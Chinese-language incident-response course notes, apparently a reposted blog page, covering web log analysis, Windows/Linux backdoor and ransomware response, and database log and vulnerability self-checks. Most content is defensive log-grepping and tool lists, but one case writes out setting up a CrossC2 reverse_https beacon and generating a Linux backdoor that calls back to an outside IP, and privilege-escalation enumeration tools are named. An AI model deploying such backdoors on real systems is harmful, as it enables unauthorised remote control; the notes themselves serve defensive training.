小迪渗透应急响应(拾)
文章目錄
- 73. WEB分析php&javaweb自動化工具(73-75)
- 應急響應:
- 必備知識點:
- 準備工作:
- 有明確信息網站被入侵:
- 無明確信息網站被入侵:
- 常見分析方法:
- 演示案例:
- 涉及資源
- 74. win&linux分析后門&勒索病毒攻擊(信息資源-重要)
- 操作系統(windows,linux)應急響應:
- 常見日志類別及存儲
- 病毒分析
- 病毒查殺
- 病毒動態
- 在線病毒掃描網站
- 演示案例:
- 涉及資源:
- 75. 數據庫&漏洞口令檢索&應急取證箱
- 必須知識點:
- 演示案例:
- 涉及資源:
視頻資源
73. WEB分析php&javaweb自動化工具(73-75)
應急響應:
保護階段,分析階段,復現階段,修復階段,建議階段
目的:分析出攻擊時間,攻擊操作,攻擊后果,安全修復等并給出合理解決方案。
必備知識點:
1.熟悉常見的 WEB 安全攻擊技術
2.熟悉相關日志啟用及存儲查看等
3.熟悉日志中記錄數據分類及分析等
準備工作:
1.收集目標服務器各類信息
2.部署相關分析軟件及平臺等
3.整理相關安全滲透工具指紋庫
4.針對異常表現第一時間觸發思路
從表現預估入侵面及權限面進行排查
有明確信息網站被入侵:
基于時間 基于操作 基于指紋 基于其他
無明確信息網站被入侵:
1.WEB 漏洞-檢查源碼類別及漏洞情況
2.中間件漏洞-檢查對應版本及漏洞情況
3.第三方應用漏洞-檢查是否存在漏洞應用
4.操作系統層面漏洞-檢查是否存在系統漏洞
5.其他安全問題(口令,后門等)-檢查相關應用口令及后門掃描
常見分析方法:
指紋庫搜索,日志時間分析,后門追查分析,漏洞檢查分析等
演示案例:
Windows+IIS+Sql-日志,搜索
Linux+BT_Nginx+tp5-日志,后門
Linux+Javaweb+st2-日志,后門,時間
360 星圖日志自動分析工具-演示,展望
涉及資源
https://www.cnblogs.com/xiaozi/p/13198071.html 10款日志分析工具
https://www.cnblogs.com/xiaozi/p/12679777.html
https://pan.baidu.com/s/1tQS1mUelmEh3I68AL7yXGg 提取碼:: xiao
74. win&linux分析后門&勒索病毒攻擊(信息資源-重要)
操作系統(windows,linux)應急響應:
1.常見危害:暴力破解,漏洞利用,流量攻擊,木馬控制(Webshell,PC 木馬等),病毒感染(挖礦,蠕蟲,勒索等)。
2.常見分析:計算機賬戶,端口,進程,網絡,啟動,服務,任務,文件等安全問題
常見日志類別及存儲
補充資料
Windows,Linux https://xz.aliyun.com/t/485 https://www.secpulse.com/archives/114019.html https://docs.microsoft.com/en-us/sysinternals/病毒分析
PCHunter:http://www.xuetr.com 火絨劍:https://www.huorong.cn Process Explorer:https://docs.microsoft.com/zh-cn/sysinternals/downloads/process-explorer processhacker:https://processhacker.sourceforge.io/downloads.php autoruns:https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns OTL:https://www.bleepingcomputer.com/download/otl/ SysInspector:http://download.eset.com.cn/download/detail/?product=sysinspector病毒查殺
卡巴斯基:http://devbuilds.kaspersky-labs.com/devbuilds/KVRT/latest/full/KVRT.exe 大蜘蛛:http://free.drweb.ru/download+cureit+free 火絨安全軟件:https://www.huorong.cn 360 殺毒:http://sd.360.cn/download_center.html病毒動態
CVERC-國家計算機病毒應急處理中心:http://www.cverc.org.cn 微步在線威脅情報社區:https://x.threatbook.cn 火絨安全論壇:http://bbs.huorong.cn/forum-59-1.html 愛毒霸社區:http://bbs.duba.net 騰訊電腦管家:http://bbs.guanjia.qq.com/forum-2-1.html在線病毒掃描網站
http://www.virscan.org //多引擎在線病毒掃描網 https://habo.qq.com //騰訊哈勃分析系統 https://virusscan.jotti.org //Jotti 惡意軟件掃描系統 http://www.scanvir.com //計算機病毒、手機病毒、可疑文件分析演示案例:
攻擊響應-暴力破解(RDP,SSH)-Win,Linux
控制響應-后門木馬(Webshell,PC)-Win,Linux
危害響應-病毒感染(勒索 WannaCry)-Windows
自動化響應檢測-Gscan 多重功能腳本測試-Linux
案例 1-攻擊響應-暴力破解(RDP,SSH)-Win,Linux
Windows-LogFusion 載入查看: 事件歸類,事件 ID,事件狀態等,參考百度資料Linux-grep 篩選: 1、統計了下日志,確認服務器遭受多少次暴力破解 grep -o "Failed password" /var/log/secure|uniq -c2、輸出登錄爆破的第一行和最后一行,確認爆破時間范圍: grep "Failed password" /var/log/secure|head -1 grep "Failed password" /var/log/secure|tail -13、進一步定位有哪些 IP 在爆破? grep "Failed password" /var/log/secure|grep -E -o "(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)"|uniq -c | sort -nr4、爆破用戶名字典都有哪些? grep "Failed password" /var/log/secure|perl -e 'while($_=<>){ /for(.*?) from/; print "$1\n";}'|uniq -c|sort -nr5、登錄成功的日期、用戶名、IP: grep "Accepted " /var/log/secure | awk '{print $1,$2,$3,$9,$11}' grep "Accepted " /var/log/secure | awk '{print $11}' | sort | uniq -c | sort -nr | more案例 2-控制響應-后門木馬(Webshell,PC)-Win,Linux
windows:默認配置測試 linux 借助 CrossC2 項目:netstat -ntulp https://github.com/gloxec/CrossC2 https://github.com/darkr4y/geacon 參考過程:http://www.adminxe.com/1287.html1.項目上傳至服務端目錄,給予執行權限2.配置監聽器: windows/beacon_https/reverse_https 阿里云記得端口放行3.生成后門: ./genCrossC2.Linux 47.99.49.65 5566 null null Linux x64 C2 通過網絡監聽工具及 windows 日志分析或執行記錄查找后門問題案例 3-危害響應-病毒感染(勒索 WannaCry)-Windows
詳細說明中毒表現及恢復指南 https://lesuobingdu.360.cn/ https://www.nomoreransom.org/zh/index.html案例 4-自動化響應檢測-Gscan 多重功能腳本測試-Linux
https://github.com/darkr4y/geacon/
涉及資源:
https://xz.aliyun.com/t/485
https://lesuobingdu.360.cn/
https://github.com/gloxec/CrossC2/
https://github.com/darkr4y/geacon/
https://github.com/grayddq/GScan/
https://bbs.pediy.com/thread-217586-1.htm
https://www.nomoreransom.org/zh/index.html
https://docs.microsoft.com/en-us/sysinternals/
https://www.secpulse.com/archives/114019.html
https://pan.baidu.com/s/1tQS1mUelmEh3I68AL7yXGg 提取碼:xiao
75. 數據庫&漏洞口令檢索&應急取證箱
必須知識點:
1.第三方應用由于是選擇性安裝,如何做好信息收集和漏洞探針也是獲取攻擊者思路的重要操作,除去本身漏洞外,提前預知或口令相關攻擊也要進行篩選。
2.排除三方應用攻擊行為,自查漏洞分析攻擊者思路,人工配合工具腳本
3.由于工具或腳本更新迭代快,分類復雜,打造自己的工具箱迫在眉睫
演示案例:
系統日志-Win 日志自動神器 LogonTracer-外網內網日志
應用分析-數據庫 Mysql&Mssql&Oracle 等分析-爆破注入操作
模擬測試-自查漏洞模擬滲透測試尋找攻擊源頭-漏洞口令檢索
專業要求-自動化 ir-rescue 應急響應取證工具箱-實時為您提供服務
案例 1-Win 日志自動神器 LogonTracer-外網內網
如何安裝使用:https://github.com/JPCERTCC/LogonTracer/wiki/linux 安裝使用筆記:阿里云主機記得開放端口及關閉防火墻
案例 2-數據庫 Mysql&Mssql&Oracle 等日志分析-爆破注入操作
常見的數據庫攻擊包括弱口令、SQL 注入、提升權限、竊取備份等。對數據庫日志進行分析,可以發現攻擊行為,進一步還原攻擊場景及追溯攻擊源。
案例 3-自查漏洞模擬滲透測試尋找攻擊源頭-漏洞口令檢索
1.日志被刪除或沒價值信息 2.沒有思路進行分析可以采用模擬滲透1.windows,linux 系統漏洞自查: WindowsVulnScan,linux-exploit-suggester D:\Myproject\venv\Scripts\python.exe cve-check.py -C -f KB.json ./linux-exploit-suggester.sh2.windows,linux 服務漏洞自查: windows:Get-WmiObject -class Win32_Product linux:LinEnum.sh searchsploit weblogic 利用前期信息收集配合 searchsploit 進行應用服務協議等漏洞檢索3.windows,linux 協議弱口令自查-工具探針或人工獲取判斷-snetcraker案例 4-自動化 ir-rescue 應急響應工具箱-實時為您提供服務
https://github.com/diogo-fernan/ir-rescue
分析腳本工具原理,嘗試自己進行編寫修改,成為自己的工具箱殺器
涉及資源:
https://github.com/rebootuser/LinEnum
https://github.com/diogo-fernan/ir-rescue
https://github.com/offensive-security/exploitdb
https://github.com/chroblert/WindowsVulnScan
https://github.com/JPCERTCC/LogonTracer.git
https://github.com/mzet-/linux-exploit-suggester
https://pan.baidu.com/s/1tQS1mUelmEh3I68AL7yXGg 提取碼:xiao
總結
以上是生活随笔為你收集整理的小迪渗透应急响应(拾)的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: 视频分割工具
- 下一篇: 华尔街见闻Istio生产实践